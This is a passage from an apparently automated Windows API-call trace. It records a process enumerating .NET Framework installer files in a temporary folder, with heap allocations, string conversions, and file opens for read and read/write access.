returned 0x7d070 [0076.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0076.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0076.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0076.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0076.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0076.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0076.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0076.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0076.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0076.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0076.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0076.571] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.571] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.571] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.571] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0076.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0076.730] AreFileApisANSI () returned 1 [0076.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Core_x86.msi", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\netfx_Core_x86.msi", lpUsedDefaultChar=0x0) returned 41 [0076.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0076.730] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.730] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0076.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0076.730] AreFileApisANSI () returned 1 [0076.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0076.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67a20 [0076.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x67a20, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 41 [0076.730] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0076.730] GetLastError () returned 0x2 [0076.730] GetLastError () returned 0x2 [0076.730] SetLastError (dwErrCode=0x2) [0076.730] GetLastError () returned 0x2 [0076.730] SetLastError (dwErrCode=0x2) [0076.730] GetLastError () returned 0x2 [0076.730] SetLastError (dwErrCode=0x2) [0076.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67a20 | out: hHeap=0x20000) returned 1 [0076.731] AreFileApisANSI () returned 1 [0076.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0076.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67540 [0076.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 41 [0076.731] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0076.731] GetLastError () returned 0x2 [0076.731] GetLastError () returned 0x2 [0076.731] SetLastError (dwErrCode=0x2) [0076.731] GetLastError () returned 0x2 [0076.731] SetLastError (dwErrCode=0x2) [0076.731] GetLastError () returned 0x2 [0076.731] SetLastError (dwErrCode=0x2) [0076.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0076.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0076.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0076.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0076.731] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.731] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.731] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf74cd515, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf74cd515, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf7cd9415, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x29222c7, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="netfx_Extended.mzz", cAlternateFileName="NETFX_~2.MZZ")) returned 1 [0076.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0076.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0076.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0076.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0076.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0076.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0076.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0076.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0076.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0076.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0076.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0076.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0076.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0076.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0076.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0076.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0076.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0076.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0076.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0076.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0076.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0076.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0076.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0076.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0076.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0076.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0076.732] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.732] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.732] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.732] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0076.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0076.732] AreFileApisANSI () returned 1 [0076.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Extended.mzz", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\netfx_Extended.mzz", lpUsedDefaultChar=0x0) returned 41 [0076.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0076.732] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.732] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0076.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0076.733] AreFileApisANSI () returned 1 [0076.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0076.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67900 [0076.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x67900, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Extended.mzz") returned 41 [0076.733] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0076.733] GetLastError () returned 0x2 [0076.733] GetLastError () returned 0x2 [0076.733] SetLastError (dwErrCode=0x2) [0076.733] GetLastError () returned 0x2 [0076.733] SetLastError (dwErrCode=0x2) [0076.733] GetLastError () returned 0x2 [0076.733] SetLastError (dwErrCode=0x2) [0076.733] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67900 | out: hHeap=0x20000) returned 1 [0076.733] AreFileApisANSI () returned 1 [0076.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0076.733] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67a20 [0076.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x67a20, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Extended.mzz") returned 41 [0076.734] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0076.734] GetLastError () returned 0x2 [0076.734] GetLastError () returned 0x2 [0076.734] SetLastError (dwErrCode=0x2) [0076.734] GetLastError () returned 0x2 [0076.734] SetLastError (dwErrCode=0x2) [0076.734] GetLastError () returned 0x2 [0076.734] SetLastError (dwErrCode=0x2) [0076.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67a20 | out: hHeap=0x20000) returned 1 [0076.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0076.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0076.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0076.734] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.734] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.734] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2dbe0800, ftCreationTime.dwHighDateTime=0x1cac6fb, ftLastAccessTime.dwLowDateTime=0x2dbe0800, ftLastAccessTime.dwHighDateTime=0x1cac6fb, ftLastWriteTime.dwLowDateTime=0x2dbe0800, ftLastWriteTime.dwHighDateTime=0x1cac6fb, nFileSizeHigh=0x0, nFileSizeLow=0xd5000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="netfx_Extended_x64.msi", cAlternateFileName="NETFX_~3.MSI")) returned 1 [0076.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0076.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0076.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0076.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0076.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0076.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0076.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0076.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0076.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0076.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0076.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0076.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0076.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0076.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0076.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0076.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0076.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0076.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0076.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0076.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0076.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0076.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0076.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0076.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0076.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0076.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0076.735] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.735] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.735] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.735] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0076.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0076.735] AreFileApisANSI () returned 1 [0076.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi", lpUsedDefaultChar=0x0) returned 45 [0076.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0076.735] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.735] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0076.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0076.735] AreFileApisANSI () returned 1 [0076.735] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0076.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71a98 [0076.735] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x71a98, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 45 [0076.735] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0076.736] GetFileType (hFile=0x42c) returned 0x1 [0076.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0076.736] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0076.736] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0076.736] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0076.736] CloseHandle (hObject=0x42c) returned 1 [0076.736] AreFileApisANSI () returned 1 [0076.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0076.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71a30 [0076.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 45 [0076.737] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0076.737] GetFileType (hFile=0x42c) returned 0x1 [0076.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0076.737] CloseHandle (hObject=0x42c) returned 1 [0076.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0076.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0076.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0076.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0076.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0076.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0076.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0076.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0076.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0076.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0076.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0076.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0076.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0076.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0076.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0076.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0076.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0076.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0076.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0076.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0076.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0076.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0076.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0076.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0076.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0076.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0076.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0076.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0076.738] AreFileApisANSI () returned 1 [0076.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0076.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71a98 [0076.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x71a98, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 45 [0076.738] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: 